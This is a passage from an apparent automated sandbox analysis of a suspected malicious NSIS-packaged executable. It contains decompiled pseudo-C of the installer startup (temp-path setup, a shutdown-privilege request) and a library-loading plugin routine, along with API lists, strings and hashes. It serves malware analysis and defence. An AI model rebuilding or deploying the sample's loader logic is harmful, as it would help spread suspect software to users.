										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403496
0x0040349a
0x004034a2
0x004034a6
0x004034ab
0x004034b7
0x004034c0
0x004034c5
0x004034c8
0x004034cf
0x004034d6
0x004034d6
0x004034cf
0x004034d8
0x004034dd
0x004034de
0x004034ea
0x004034ee
0x004034f4
0x00403502
0x00403507
0x0040350e
0x00403512
0x00403516
0x00403518
0x00403518
0x00403516
0x00403520
0x00403527
0x0040352d
0x00403543
0x00403553
0x00403558
0x0040355e
0x00403565
0x00403571
0x0040357b
0x0040357d
0x0040357f
0x00403584
0x00403584
0x00403594
0x0040359a
0x00403663
0x00403663
0x00403665
0x00403667
0x00000000
0x00000000
0x004035a3
0x004035a6
0x004035ae
0x004035ae
0x004035b1
0x004035b6
0x004035b8
0x004035b8
0x004035b9
0x004035b9
0x004035be
0x004035c1
0x00403653
0x00403658
0x0040365d
0x00403660
0x00403662
0x00403662
0x00403662
0x00000000
0x004035c7
0x004035c7
0x004035c8
0x004035cb
0x004035e3
0x0040360e
0x00403610
0x00403623
0x0040364e
0x00403651
0x0040366f
0x00403672
0x0040367b
0x00403680
0x00403686
0x00403691
0x00403693
0x00403698
0x0040369a
0x004036f2
0x004036f7
0x00403701
0x00403708
0x0040370c
0x004037a0
0x004037a0
0x004037a5
0x004037ab
0x004037b0
0x004038d4
0x004038da
0x00403956
0x00403956
0x0040395b
0x0040395e
0x00403960
0x00403960
0x00403968
0x00403968
0x004038ea
0x004038f2
0x004038f4
0x004038f5
0x00403902
0x00403915
0x0040391d
0x00403921
0x00403921
0x00403929
0x0040392e
0x00403935
0x00403943
0x00403945
0x0040394b
0x0040394d
0x00000000
0x00000000
0x00000000
0x00403937
0x0040393d
0x0040393f
0x00403941
0x0040394f
0x00403951
0x00000000
0x00403951
0x00000000
0x00403941
0x00403935
0x004037bf
0x004037c6
0x004037c6
0x00403718
0x00403790
0x00403790
0x0040379c
0x00000000
0x0040379c
0x00403721
0x00403725
0x0040375b
0x0040375b
0x0040375d
0x00403765
0x004037d7
0x004037d9
0x004037e0
0x004037e8
0x004037e8
0x004037f3
0x004037f8
0x00403807
0x0040380b
0x0040380c
0x00403815
0x0040380e
0x0040380e
0x0040380e
0x0040381b
0x00403821
0x00403827
0x0040382f
0x0040382f
0x0040383d
0x00403842
0x00403854
0x0040385c
0x00403862
0x0040386e
0x00403874
0x0040387e
0x00403894
0x004038a5
0x004038ab
0x004038b2
0x004038b5
0x004038bb
0x004038bb
0x004038b2
0x004038bf
0x004038c5
0x004038c5
0x004038ca
0x004038ca
0x00000000
0x00403807
0x00403767
0x00403769
0x00403774
0x00000000
0x00000000
0x0040377c
0x00403787
0x0040378c
0x00000000
0x0040378c
0x00403750
0x00403752
0x00403756
0x00403759
0x00000000
0x00000000
0x00000000
0x00403759
0x00000000
0x00403752
0x004036a2
0x004036ae
0x004036b3
0x004036b8
0x004036ba
0x00000000
0x00000000
0x004036c2
0x004036ca
0x004036db
0x004036e3
0x004036e5
0x004036ea
0x004036ec
0x00000000
0x00000000
0x00000000
0x004036ec
0x00000000
0x00403651
0x00403612
0x00403615
0x00403618
0x0040361e
0x0040361e
0x0040361e
0x0040361e
0x00000000
0x0040361e
0x0040361a
0x0040361c
0x00000000
0x00000000
0x00000000
0x0040361c
0x004035cd
0x004035d0
0x004035d3
0x004035d9
0x004035d9
0x00000000
0x004035d9
0x004035d5
0x004035d7
0x00000000
0x00000000
0x00000000
0x004035d7
0x00000000
0x00000000
0x00000000
0x004035a8
0x004035a8
0x004035a8
0x004035a9
0x004035a9
0x00000000
0x004035a8
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 004034AB
GetVersion.KERNEL32 ref: 004034B1
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
OleInitialize.OLE32(00000000), ref: 00403527
SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
CharNextA.USER32(00000000,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,00000020,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90), ref: 00403B50
Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4

Part of subcall function 0040396E: CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
Part of subcall function 0040396E: CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
ExitProcess.KERNEL32 ref: 004037C6
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
ExitProcess.KERNEL32 ref: 00403968

Part of subcall function 00405969: MessageBoxIndirectA.USER32(0040A230), ref: 004059C4

Strings

Setup Setup, xrefs: 0040354E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403686, 0040368B, 004036A1, 004036AD, 004036BC, 004036C9, 004036D5, 004036DD, 004037D6, 004037E7, 004037F2, 004037FE, 0040380B, 0040381A, 004038C9
.tmp, xrefs: 004037ED
1033, xrefs: 004036F2
C:\Users\user\AppData\Local\Temp, xrefs: 00403676, 00403777, 00403821, 0040382A
UXTHEME, xrefs: 004034D8, 004034DD, 004034E3
Low, xrefs: 004036C4
", xrefs: 004035B9
Error launching installer, xrefs: 0040375D
C:\Users\user\AppData\Local\Temp, xrefs: 00403782
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040349A
C:\Users\user\Desktop, xrefs: 004037F8, 004037FD, 00403829
TMP, xrefs: 004036DE
NSIS Error, xrefs: 00403549
\Temp, xrefs: 004036A8
SeShutdownPrivilege, xrefs: 004038FC
TEMP, xrefs: 004036D6
~nsu, xrefs: 004037D1
"C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 0040355E, 00403564, 0040371B
C:\Users\user\Desktop\lpdKSOB78u.exe, xrefs: 00403883

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\lpdKSOB78u.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\lpdKSOB78u.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 538718688-4101208944
Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E

Uniqueness

Uniqueness Score: -1.00%

Function 70481A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E70481A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E70481215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E70481215();
				_t320 = E7048123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E704812FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E70481534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x70482259) & 0x000000ff) * 4 +  &M704821CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E70481224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E70481215();
											 &_v12 = E70481A36( &_v12);
											__eax = E70481429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E70481A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E70481A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7048305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E70481A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323); // executed
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E704815C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E704812FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E704815C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323); // executed
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E704812FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E704812FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E704812FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E70481224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E704812FE(_t90) * 4);
					goto L165;
				}
			}

0x70481aa0
